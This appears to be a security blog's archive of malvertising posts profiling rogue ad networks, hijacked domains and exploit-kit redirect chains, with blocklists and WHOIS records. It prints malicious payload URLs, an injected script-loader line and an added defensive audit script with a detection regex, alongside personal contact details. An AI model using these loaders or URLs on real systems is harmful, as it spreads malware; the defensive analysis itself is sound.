Showing posts with label Malvertising.

Wednesday, 24 February 2016

Evil network: 184.154.28.72/29 (Marko Cipovic / Singlehop) and liveadexchanger.com

liveadexchanger.com is an advertising network with a questionable reputation currently hosted on a Google IP of 146.148.46.20. The WHOIS details are anonymous, never a good sign for an ad network.

Seemingly running ads on the scummiest websites, liveadexchanger.com does things like trying to install fake Flash updates on visitors' computers, as can be seen from this URLquery report... you might find the screenshot missing because of the complex URL, so here it is..


That landing page is on alwaysnewsoft.traffic-portal.net (part of an extraordinarily nasty network at 184.154.28.72/29), which then forwards unsuspecting visitors to a fake download at intva31.peripheraltest.info, which you will not be surprised to learn is hosted at the adware-pusher's favourite host, Amazon AWS.

Of the 567 sites that have been hosted in this /29 (not all are there now), 378 of them are tagged as malicious in some way by Google (67%) and 157 (28%) are also tagged by SURBL as being malicious in some way. Overall then, 74% are marked as malicious by either Google or SURBL; the remaining 26% have most likely just not been caught up with yet. The raw data can be seen here [pastebin].

At the time of writing, the following websites appear to be live:


The WHOIS details for this block:
%rwhois V-1.5:003eff:00 rwhois.singlehop.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:ORG-SINGL-8.184-154-28-72/29
network:Auth-Area:184.154.0.0/16
network:IP-Network:184.154.28.72/29
network:Organization:Marko Cipovic
network:Street-Address:Kralja Nikole 33
network:City:Podgorica
network:Postal-Code:81000
network:Country-Code:CS
network:Tech-Contact;I:NETWO1546-ARIN
network:Admin-Contact;I:NETWO1546-ARIN
network:Abuse-Contact;I:ABUSE2492-ARIN
network:Created:20150323
network:Updated:20150323


If you are using domain-based blocklists, this [pastebin] is the list of domains currently or formerly hosted on this block with the subdomains removed. Other than that, I would recommend the following blocklist:

liveadexchanger.com
184.154.28.72/29

Friday, 18 July 2014

Something evil on 5.135.211.52 and 195.154.69.123

This is some sort of malware using insecure OpenX ad servers to spread. Oh wait, insecure is pretty much the default configuration for OpenX servers..

..anyway, I don't know quite what it is, but it's running on a bunch of hijacked GoDaddy subdomains and is triggering a generic JavaScript detection on my gateway. Domains spotted in this cluster are:


The two IPs in use both belong to OVH France, but 5.135.211.52 is suballocated to QHoster Ltd (Bulgaria) [VT] and 195.154.69.123 is suballocated to Iliad Entreprises (France) [VT]. This second IP has also been used to host "one two three" malware sites back in May.

Recommended blocklist:
5.135.211.52
195.154.69.123
somerspointnjinsurance.com
risleyhouse.net
ecofloridian.info
ecofloridian.com
trustedelderlyhomecare.net
trustedelderlyhomecare.org
trustedelderlyhomecare.info
theinboxexpert.com

Friday, 13 June 2014

Something evil on 64.202.123.43 and 64.202.123.44

This is one of those ephemeral traces of malware you sometimes see, like a will-o'-the-wisp. Something seems to be there, but on closer examination it has vanished. But this isn't an illusion, it seems to be a cleverly constructed way of distributing malware which pops up and then vanishes before anyone can analyse it.

The source of the infection seems to be a malvertisement on one of those sites with an immensely complicated set of scripts running on all sorts of different sites, including those low-grade ad networks that have a reputation for not giving a damn about what their advertisers are doing.

In this case, the visitor gets directed to a page at 12ljeot1.wdelab.com/ijvdg2k/2 which got picked up with a generic malware detection.. but by the time anyone gets to investigate the domain it is mysteriously not resolving.

What appears to be happening is that the bad guys are publishing the malicious subdomains only for a very short time, then they stop it resolving and they publish another one. And one thing all these domains have in common is that they are using afraid.org for nameserver services.

A bit of investigation shows that this malware is hosted on a pair of servers at 64.202.123.43 and 64.202.123.44 (HostForWeb, US), and despite the bad guys' efforts they do leave a trace on services such as VirusTotal [1] [2] and URLquery [3]. This particular URLquery report shows indications of the Fiesta EK.

The attackers are covering their traces by using legitimate hijacked domains, the owners of which may not even be aware of the problem. Despite there being a large number of subdomains, I can only spot six domains being abused:

theholdens.org
denytech.com
jonmills.org
wdelab.com
dimatur.pt
hebel.ch

A full list of the subdomains that I have found so far can be found here [pastebin].

A look at the 64.202.123.0/24 block shows a mix of legitimate sites, plus some spammy ones and quite a lot that look malicious. If you are running a high-security environment then you might want to block this whole range. Otherwise, I would recommend the following minimum blocklist:

64.202.123.43
64.202.123.44
theholdens.org
denytech.com
jonmills.org
wdelab.com
dimatur.pt
hebel.ch

Friday, 7 February 2014

Something evil on 69.64.39.166

69.64.39.166 (Hosting Solutions International, US) appears to be hosting an exploit kit (possibly Fiesta) according to URLquery reports such as this one.

The code is being injected into target websites, possibly through a malvertising campaign. I would recommend blocking the IP address as the simplest option, although I can identify the following domains on that same IP, all of which are likely to be malicious.



Thursday, 16 January 2014

Ongoing fake Flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:


What has happened is that somehow an attacker has altered several .js files on the victim's site and has appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor.de/assets/rollover.js as follows (click to enlarge):


In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.
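One defender-side check for the pattern described above, as an added example that is not code from the blog: compare each deployed .js file with its known-good copy, report whether the change is a pure append, and pull out loader URLs of the <host>/<random>.php?id=<digits> shape quoted here that point at hosts other than the site's own. The helper names, the regex and the sample files are constructed; only the injected URL is taken from the post.

```python
"""Integrity audit for a site's static .js files, aimed at the appended-code
pattern above: the original script is left intact and a tail is added that
loads a second stage from some other (hijacked) host via <random>.php?id=N.
Added example; the helper names and the sample files are constructed."""
import hashlib
import re

# Loader URLs quoted on this page share the shape <host>/<path>.php?id=<digits>.
# Constructed pattern: absolute or protocol-relative, case-insensitive host.
LOADER_URL_RE = re.compile(
    r"(?:https?:)?//([a-z0-9.-]+)/(?:[a-z0-9_-]+/)*[a-z0-9_-]+\.php\?id=\d+",
    re.IGNORECASE,
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify_change(baseline: bytes, current: bytes) -> str:
    """'unchanged'; 'appended' when the known-good bytes survive as a prefix
    (the pattern described above); otherwise 'modified'."""
    if current == baseline:
        return "unchanged"
    if current.startswith(baseline):
        return "appended"
    return "modified"


def foreign_loader_hosts(js: bytes, site_hosts: set[str]) -> list[str]:
    """Hosts of loader-style URLs in *js* that are not the site's own hosts."""
    text = js.decode("utf-8", errors="replace")
    hosts = {m.group(1).lower() for m in LOADER_URL_RE.finditer(text)}
    return sorted(h for h in hosts if h not in site_hosts)


def audit(baseline: dict[str, bytes], live: dict[str, bytes],
          site_hosts: set[str]) -> dict[str, dict]:
    """Compare the deployed copy of each script with the known-good copy.

    *baseline* maps path -> bytes from version control or the deploy
    artefact; *live* maps path -> bytes fetched from the web server.
    Paths missing from either side are reported too, since an attacker may
    add a new file or the baseline may be stale."""
    report = {}
    for path in sorted(set(baseline) | set(live)):
        good, now = baseline.get(path), live.get(path)
        if good is None or now is None:
            side = "baseline" if good is None else "live"
            report[path] = {"status": "missing-in-" + side}
            continue
        status = classify_change(good, now)
        entry = {"status": status, "sha256": sha256_hex(now)}
        if status != "unchanged":
            # For an append only the tail is new; for an in-place edit scan it all.
            tail = now[len(good):] if status == "appended" else now
            entry["added_bytes"] = len(now) - len(good)
            entry["loader_hosts"] = foreign_loader_hosts(tail, site_hosts)
        report[path] = entry
    return report


# Constructed sample: a benign rollover helper, and the same file with a
# loader tail of the kind described above appended (URL taken from the post).
CLEAN_ROLLOVER = b"function swap(el, src) { el.src = src; }\n"
INJECTED_TAIL = (b"document.write('<script src=\"http://ghionmedia.com/PROjes/"
                 b"goar2RAn.php?id=56356336\"></script>');\n")
SAMPLE_BASELINE = {"assets/rollover.js": CLEAN_ROLLOVER,
                   "im10.js": b"var im = {};\n"}
SAMPLE_LIVE = {"assets/rollover.js": CLEAN_ROLLOVER + INJECTED_TAIL,
               "im10.js": b"var im = {};\n"}
SITE_HOSTS = {"www.physiomedicor.de", "physiomedicor.de"}


def audit_sample() -> dict[str, dict]:
    """Run the audit over the constructed sample site."""
    return audit(SAMPLE_BASELINE, SAMPLE_LIVE, SITE_HOSTS)


if __name__ == "__main__":
    for path, finding in audit_sample().items():
        print(path, finding)
```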

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID, which indicates that some party other than Adscend Media LLC may be responsible. This link comes up blank when I try to follow it, which might mean a number of things (including the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, ilmeteo.it is the 29th most popular site in Italy and the 1305th most popular worldwide.

This URLquery report shows the scripts with the injected code:


The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.

Wednesday, 9 January 2013

Something evil on 173.246.102.246

173.246.102.246 (Gandi, US) looks like it is hosting exploit kits that are being promoted either through malvertising or through exploited OpenX ad servers.

In the example I have seen, the malicious payload is at [donotclick]11.lamarianella.info/read/defined_regulations-frequently.php (report here). These other domains appear to be on the same server, all of which can be assumed to be malicious:

11.livinghistorytheatre.ca
11.awarenesscreateschange.com
11.livinghistorytheatre.com
11.b2cviaggi.com
11.13dayz.com
11.lamarianella.info
11.studiocitynorth.tv
11.scntv.tv

These all appear to be legitimate but hijacked domains, so you may want to block the whole domain rather than just the 11. subdomain.

Wednesday, 10 October 2012

Something evil on 96.44.139.218 / perclickbank.org

There's something evil on 96.44.139.218 (OC3 Networks, US):

perclickbank.org
google-analitlcs.com
google-statistic.com
nailart4designs.com

Malvertising, basically. More details here.


Wednesday, 3 October 2012

Something evil on 66.45.251.224/29 and 199.71.233.226

The IP address 199.71.233.226 (Netrouting, US) and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted:

network:Class-Name:network
network:ID:NETBLK-INTSRV.66.45.224.0/19
network:Auth-Area:66.45.224.0/19
network:Network-Name:INTSRV-66.45.251.224
network:IP-Network:66.45.251.224/29
network:Org-Name:Private Customer
network:Street-Address:Private Residence
network:City:Moscow
network:State:77
network:Postal-Code:119192
network:Country-Code:US
network:Created:20120701
network:Updated:20120816
network:Updated-By:abuse@interserver.net


The domains listed below are on those IP addresses, all appear to be distributing malware (see example) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat.

Update: 95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here).

Update 2: Another IP in this cluster is 96.44.139.218 (OC3 Networks, US), running malicious ads using the domain perclickbank.org (scroll down for more information)


Added: 6/10/12
adp.joyforppv.info
giantppv.info
giantcpa.info

Added: 10/10/12
highloadcpa.info
highloadppa.info
entry.highloadppa.info
giantppa.info
highloadpop.info
highloadcpv.info
highloadppv.info

Also, on  96.44.139.218:
perclickbank.org
google-analitlcs.com
google-statistic.com
nailart4designs.com

Friday, 10 August 2012

wetter.com compromised? oseparatekines.net and 81.17.24.69

The weather site wetter.com is the 25th most popular site in Germany (and number 602 in the world) according to Alexa.

Right at the moment there appears to be a compromised ad being served up by billabong3.wetter.com redirecting to an exploit kit on [donotclick]oseparatekines.net/forum/index.php?showtopic=903878 hosted on 81.17.24.69, which is apparently hosted in Switzerland and belongs to a small netblock as follows:

inetnum:         81.17.24.64 - 81.17.24.95
netname:         CLIENT2391
descr:           CLIENT2391
country:         CH
admin-c:         JP5315-RIPE
tech-c:          JP5315-RIPE
status:          ASSIGNED PA
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

person:          James Prado
address:         Torres De Las Americas Torre C Floor 29 Suite 2901 Panama City, Panama
phone:           +5078365602
nic-hdl:         JP5315-RIPE
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

route:           81.17.16.0/20
descr:           Ripe Allocation
origin:          AS51852
mnt-by:          KP73900-MNT
source:          RIPE # Filtered

The following domains are hosted on that IP address and you should assume they are malicious:

The entire 81.17.24.64/27 range looks suspicious in my opinion. Blocking that range would probably be prudent.

You can see the full script that is being used in the attack here - http://pastebin.com/CMuUm05f

Friday, 20 July 2012

Wire Transfer spam / porschedesignrussia.ru

This fake wire transfer spam leads to malware on porschedesignrussia.ru:

Date:      Fri, 20 Jul 2012 04:10:52 +0100
Subject:      RE: Your Wire Transfer N02526593

Good morning,

Wire debit transfer was canceled by the other financial institution.

Canceled transfer:

FED REFERENCE NUMBER: ISL9653367088ODP06829K

Transfer Report: View

Federal Reserve Wire Network

The malicious payload is at [donotclick]porschedesignrussia.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186

These are the same IP addresses as used in this attack from yesterday. Blocking them would probably be prudent.

Thursday, 9 September 2010

Evil network: MAXHOSTING Services, kfppp.com and the BBC Radio 3 compromise

MAXHOSTING are a fairly prolific evil network that I profiled last month, so it isn't a huge surprise to see that the evilness continues as normal.

But one thing that made MAXHOSTING stand out today was their involvement in an apparent compromise on the BBC's website, as reported by The Register.  Google have labelled the BBC's Radio 3 subsite as being potentially dangerous:

Safe Browsing
Diagnostic page for bbc.co.uk/radio3

What is the current listing status for bbc.co.uk/radio3?

    Site is listed as suspicious - visiting this web site may harm your computer.

    Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

    Of the 15 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-09, and the last time suspicious content was found on this site was on 2010-09-09.

    Malicious software is hosted on 1 domain(s), including kfppp.com/.

    1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including z145235.infobox.ru/.

    This site was hosted on 1 network(s) including AS2818 (BBC).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, bbc.co.uk/radio3 did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

    No, this site has not hosted malicious software over the past 90 days.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

So, what do we know about kfppp.com? Well, it was registered one day ago via black hat domain registrar BIZCN to a fake recipient, and is hosted on a server at 77.78.240.253, which is in Maxhosting's range.. so obviously this is nothing good.

The trouble is that the BBC site seems clean and it is not apparent where the infection is coming from, but the BBC site does carry ad banners for non-UK visitors, and it seems possible that a malvertisement somewhere is to blame. Although Google does sometimes make false positives, this particular report is very specific and I tend to believe that the BBC Radio 3 site is (or was) compromised with malicious code.

A full breakdown of current sites, IP addresses and MyWOT reputations can be downloaded from here.

The best advice is to completely block traffic to 77.78.239.x and 77.78.240.x (or better still, the 77.78.224.0/19 parent block), or block traffic to the domains below.


Wednesday, 4 August 2010

"Anatomy Of An Attempted Malware Scam"

If you work in IT Security then malicious ads are a regular pain in the backside.. and you probably wonder why "reputable" ad networks get talked into running them. This article is possibly the best thing I have read on the problem, written from the ad network's point of view. It seems the Bad Guys do go to extraordinary lengths to try to look genuine, but sometimes the simplest checks can reveal that they are not what they seem.

Hat Tip

Monday, 12 April 2010

FarmTown, impressionclub.com and justimpression.com

Sandi at Spyware Sucks reports that the popular(ish) Facebook game FarmTown (not FarmVille) has been compromised, possibly through a malicious banner.

The domain justimpression.com has been fingered as part of the malware chain, registered to the infamous "Private person" of:

Registrant:
Private person
Armand Gregori (armandgregory3@gmail.com)
Federicsshopen via 3
Katowice
Katowice,S589FG
PL
Tel. +34.41528965

Creation Date: 17-Dec-2009
Expiration Date: 17-Dec-2010

Domain servers in listed order:
ns2.reg.ru
ns1.reg.ru

That email address is pretty well known for malware distribution.

The site is hosted on 64.120.176.42 along with a site called impressionclub.com. "Impression Club" claims to be a Pennsylvania-based company that has been in business for four years, except that the domain was only registered in January 2010 with anonymous contact details and Russian nameservers.


You can probably count impressionclub.com as a rogue ad network and one to avoid.

The FarmTown developers have a forum thread about the problem (one poster identifies an ad for greetingcards.com as the culprit) and there are several threads on Facebook about this [1] [2] [3] [4] [5] which also point at the following domains as being part of the chain:


All these domains are registered with apparently false details. There are probably a bunch more, but I'm having difficulty resolving the IPs at the moment.

This could be a fairly big deal: Quantcast reports that justimpression.com has a traffic rank of 6,227 and pulled in 329,000 US visitors during February.


This is another good reason to block Facebook in corporate environments, and also a useful warning that you need to be very, very careful when selling ad space!

Friday, 5 February 2010

More fake ad networks

The German news site Handelsblatt was recently the victim of a malvertising campaign:

02.02.2010: Handelsblatt malware on website

Update: infected banners confirmed!

S-CERT was able to reproduce the infection on the IHT website in its test laboratory. The infection occurs through an advertising banner served from doubleclick.net, which in turn embeds advertisements from the domain "muentely.com" into the Handelsblatt page. The latter site has clearly been manipulated and contains malicious JavaScript code.

Further investigations in the S-CERT test laboratory have confirmed that, among other things, a PDF vulnerability is being used to spread the malware. The studies also show that, as an alternative to this vulnerability, further attack code attempts to exploit other gaps to install malware onto vulnerable PCs.

According to S-CERT's investigations, the malware with which the visiting PCs are eventually infected is so-called scareware: by displaying appropriate dialogs, users are told that their PC is extensively infected with malware. To remove this malware, suitable protective software is offered for purchase. To lend weight to the malware message, the scareware ensures that no new applications can be started on infected PCs. Corresponding reports from users may also indicate an infection.

The malware campaign was running via Doubleclick and Nuggad.net, directing through a bunch of domains that look like ad agencies but aren't before ending up in a server in Panama.

The fake ad agencies are in the 213.163.75.x range, all recently registered through BIZCN.COM in China, a fairly well known black hat registrar.

Note that while the domains appear to be fake, the registration data may include the details of innocent third parties, so I have not published it here. I would recommend avoiding doing business with them unless you can absolutely verify their credentials.

Wednesday, 20 January 2010

AdSlash.com is a bogus ad network

We've seen a number of ads being punted through AdSlash.com to legitimate ad networks, but it appears that these are leading to a PDF Exploit (don't visit these sites, obviously!).

For example:
fwlink.nx7.zedo.com.adslash.com/?alx=a27131939386&td=qcbp71pz=42834&sz=728x90&_zm=359161&st=n1n4&id=131939386&zcw=gh17chl277&xryr=3913771&mp=1460h1
fwlink.nx7.zedo.com.adslash.com/stats_js_e.php?id=131939386
fwlink.nx7.zedo.com.adslash.com/bdb/Health/banner_728.gif
fridayalways.com/kven/index.php
fridayalways.com/kven/js/common.js
fridayalways.com/kven/pdfadmnplay.php
fridayalways.com/kven/files/backoutblack.pdf

or

fwlink.nx7.zedo.com.adslash.com/?alx=a27131959519&td=qcbp71pz=42834&sz=120x600&_zm=359161&st=n1n4&id=131959519&zcw=gh17chl277&xryr=3913771&mp=1460h1
uparms.com/uparmglde/index.php
uparms.com/uparmglde/js/zingvaz.js
uparms.com/uparmglde/sexxhsdtk.php
which then loads a PDF exploit

or

fwlink.nx7.zedo.com.adslash.com/?alx=a27131958218&td=qcbp71pz=42834&sz=300x250&_zm=359161&st=n1n4&id=131958218&zcw=gh17chl277&xryr=3913771&mp=1460h1
setsup.com/setglde/index.php
setsup.com/setglde/js/common.js
setsup.com/setglde/ffcollab.php
setsup.com/setglde/files/slob.pdf

Despite the use of "zedo.com" in the subdomain, there is no evidence that these are being syndicated through Zedo.

Let's look at the WHOIS entry for AdSlash.com first:

Domain name: adslash.com

Registrant Contact:
PublishingAlert
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Administrative Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Technical Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

Billing Contact:
Vivian Mitchell jacksosomands@gmail.com
650-887-5087 fax:
2069 Duck Creek Road
Oakland CA 94612
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2010-01-04
Expires: 2011-01-04

The address looks plausible at first glance, but there is no Duck Creek Road in Oakland, and the phone number most likely belongs to Los Altos, not Oakland. The domain was registered only days ago, which is a clue in itself, and the registrar turns out to be BIZCN.COM of China, an odd choice for a California company. In other words, the domain registration details are fake.

AdSlash.com is hosted on 217.23.7.6, which is reportedly a Worldstream data center in Faro, Portugal. There is a cluster of domains on neighbouring servers with similarly fake registration details, which are probably related:

217.23.7.6
Adslash.com
Dc2way.com
Ispmns.com
Rtcohost.com
Vpsroll.com

217.23.7.7
Net-wisp.com
Realhgost.com
Slhoste.com

217.23.7.8
Inhostin.com
Nx7tech.com
Vpbyte.com

217.23.7.9
Eywtech.com
Qhostin.com
Sslcode.com

Blocking the entire 217.23.7.0/24 range will probably do no harm at all; it is full of typosquatting domains and other crap.

The PDF exploit itself is hosted in Russia on 213.108.56.18 at Infoteh Ltd (UNNET-LINER). Several domains are serving these exploits:
  • alwaysinwork.com
  • fridayalways.com
  • runsup.com
  • uparms.com
  • upmostly.com
WHOIS details show the infamous moldavimo@safe-mail.net email address.

Registrant:
Name: dannis
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610

Administrative Contact:
Name: dannis
Organization: privat person
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610
Phone: +7.9957737737
Fax: +7.9957737737
Email: moldavimo@safe-mail.net

Technical Contact:
Name: dannis
Organization: privat person
Address: Moskow
City: Moskow
Province/state: MSK
Country: RU
Postal Code: 130610

The whole UNNET-LINER netblock of 213.108.56.0 - 213.108.63.255 (213.108.56.0/21) looks fairly sordid; blocking access to it will probably do no harm.

As a side note, AdSlash.com used to be owned by a hosting company called RackSlash, but the domain expired and was re-registered.

If you are accepting new ad banners, always look closely at the WHOIS details and other credentials to make sure that you are dealing with who you think you are dealing with.

Friday, 15 January 2010

zoombanner.com / YieldManager malvertisement on ebuddy.com

ebuddy.com is running a malicious ad on the zoombanner.com domain, apparently managed by Yieldmanager.

First, the "legitimate" end of the malware chain loads at ad.zoombanner.com/content?campaign=1171557&sz=6
This forwards to deliver.commismanderakis.com/rotate?m=2;b=6;c=1;z=585778
Which goes to content.fishpotboutademalled.com/track/3388182/S_IT?[snip]
Then img.commismanderakis.com/img?XAhIPWtICDkJX0FVHXUDKFoRYhYlRxFCNlsBGEhLBEtVdRdiCRYKBA8kKV9RHBEaXFJfXFMHAQ
Followed by the payload domain at jduvazuc.info/cgi-bin/dep
then jduvazuc.info/cgi-bin/dep/j006102Hd793447cR55e239b8T9cc338b5V0100f060203L69740000000000000000
then jduvazuc.info/cgi-bin/dep/o006102203317l0010Hd793447cR55e239b8T9cc338b6V0100f060
Finally jduvazuc.info/cgi-bin/dep/e006102203318l0010Hd793447cJ0d000601R55e239b8T9cc338a4U0ec2fc77V0100f0600

This last hop tries to load an executable (and probably some other crap I haven't spotted), not very well detected according to VirusTotal. Oh yes, there's a PDF exploit too.

The malicious ad is an Italian language vacation banner in this case.


Most of the domains have anonymous registration details, except zoombanner.com, which has the same details that were used in the malicious ads featured here and here.

zoombanner.com

Registrant:
Domain Owner
15156 SW 5th
Scottsdale, Arizona 85260
United States

Domain Name: ZOOMBANNER.COM
Created on: 24-Jul-09
Expires on: 24-Jul-10
Last Updated on: 24-Jul-09

Administrative Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
+1.8005551212 Fax --

Technical Contact:
Owner, Domain trafficbuyer@gmail.com
15156 SW 5th
Scottsdale, Arizona 85260
United States
+1.8005551212 Fax --

Domain servers in listed order:
NS45.DOMAINCONTROL.COM
NS46.DOMAINCONTROL.COM

A search for the IP addresses shows that Linode is providing most of the infrastructure (again), with ezzi.net providing the payload server.

ad.zoombanner.com
69.164.215.205, 69.164.215.204 [Linode]

deliver.commismanderakis.com
74.207.232.205, 74.207.232.206, 74.207.232.248, 74.207.232.249, 74.207.232.250, 74.207.232.25, 74.207.232.30, 74.207.232.31, 74.207.232.35, 74.207.232.39, 74.207.232.202, 74.207.232.203 [Linode]

content.fishpotboutademalled.com
69.164.196.55 [Linode]

jduvazuc.info
216.150.79.74 [AccessIT / ezzi.net]

Incidentally, 69.164.196.55 also hosts a bunch of domains which are probably malicious:
  • Aspoutceringlapham.com
  • Baalcootymalachi.com
  • Bangywhoaswaikiki.com
  • Bertbleepedupsurge.com
  • Bluegumgodfulfrowzly.com
  • Bookletjigsawsenam.com
  • Boursesdeployporomas.com
  • Cabullacoexertstephen.com
  • Camastuthbroomer.com
  • Camocaexcidealaric.com
  • Cursarophitkamass.com
  • Dunnishbribesteen.com
  • Dusaexsurgeenzed.com
  • Eelfishminibusdaniel.com
  • Enyopensilflux.com
  • Fishpotboutademalled.com
  • Galasynjingkoendoss.com
  • Gombayuranidetripper.com
  • Haileschoralephydra.com
  • Haredjuvenalalkyds.com
  • Hoofishsmutsdela.com
  • Jigmenbrasschaves.com
  • Jumnamontanodillon.com
  • Limanadernaggly.com
  • Malabarvoiotiahsln.com
  • Mashlampeasewahima.com
  • Miauwbustianraynold.com
  • Mowewindsortejo.com
  • Nahshufrosterpappus.com
  • Negreetflurtagma.com
  • Nitrotowelvidovic.com
  • Oaterhabeasroyalet.com
  • Ospswraxledfummel.com
  • Oundycelticrecomb.com
  • Pcdosbahnerdalea.com
  • Pealedlupulicdunker.com
  • Polarlyfoetiskart.com
  • Potwareabipondeana.com
  • Psatchargeehewart.com
  • Puddyolderrippon.com
  • Sallierdiaushawed.com
  • Sarddieterchuted.com
  • Scullogmooerslarking.com
  • Siwardupttorntrib.com
  • Skouthlazordurning.com
  • Suttenbnetifla.com
  • Tacomanheathsdisodic.com
  • Temperabiceswayaka.com
  • Teughlyhesperegerek.com
  • Toterterrenobrasero.com
  • Vaccarykakkakcaddoan.com
  • Viperanmeatsoths.com
  • Viznomyboohoorigs.com
  • Voluntyseventechny.com
  • Wartedbiterhunter.com
  • Woodardvirgetoruli.com
  • Yawybottlersuccahs.com
  • Zirklehalavahhaunchy.com
I suspect that you probably wouldn't miss much by null-routing Linode completely at the moment.

Thursday, 14 January 2010

More malvertisement domains

The malicious ads were running through (and I understand now terminated by) bootcampmedia.com, related to this post, according to commenter cerdo:

Blogger cerdo said...

bootcampmedia.com was also likely hosting a malicious campaign yesterday afternoon, and perhaps still ongoing. I'd contact you Jamie, but I don't have contact info for you. This all is clearly closely related to Dynamoo's post...

traffic.worldseescolor.com is an obvious bad actor. The other related domains:
deliver.bailagequinismregrow.com
img.bailagequinismregrow.com
content.cabullacoexertstephen.com

as well as:
aanserver88.com
bonnapet.com
afkenai.com
bfskul.com

14 January 2010 18:40

Blogger cerdo said...

Yep - saw traffic.worldseescolor.com via bootcamp again less than 30 minutes ago.

Related sites, accessed immediately after traffic.worldseescolor.com:

deliver.boaterdunnagechicot.com
img.boaterdunnagechicot.com

14 January 2010 18:45
These are worth checking your logs for and blocking, in case they turn up on another network. Checking the IPs comes up with:

traffic.worldseescolor.com
69.164.215.208, 69.164.215.210, 69.164.215.205, 69.164.215.207, 69.164.215.204 [Linode]

deliver.bailagequinismregrow.com
74.207.232.205, 74.207.232.250, 74.207.232.249, 74.207.232.248, 74.207.232.203, 74.207.232.30, 74.207.232.206, 74.207.232.31, 74.207.232.39, 74.207.232.25, 74.207.232.202, 74.207.232.35 [Linode]

img.bailagequinismregrow.com
174.143.243.220, 98.129.238.102, 98.129.238.106, 98.129.236.239, 174.143.245.236, 98.129.237.14, 174.143.242.109, 174.143.243.90, 98.129.236.154, 98.129.238.101, 98.129.238.112, 98.129.236.254, 174.143.241.174, 98.129.238.105, 98.129.238.103, 174.143.243.162, 174.143.242.58, 98.129.238.99
[Slicehost / Rackspace]

content.cabullacoexertstephen.com
69.164.196.55 [Linode]

aanserver88.com
67.225.149.152 [Liquid Web]

bonnapet.com
Was 217.20.114.40 [Netdirekt / internetserviceteam.com] now appears to be down.

afkenai.com
195.2.253.93 [Madet Ltd, Moscow]

bfskul.com
195.2.253.93 [Madet Ltd, Moscow]

I don't have the full trace of these, so it's not exactly clear what these domains are doing in the reported chain.

Wednesday, 13 January 2010

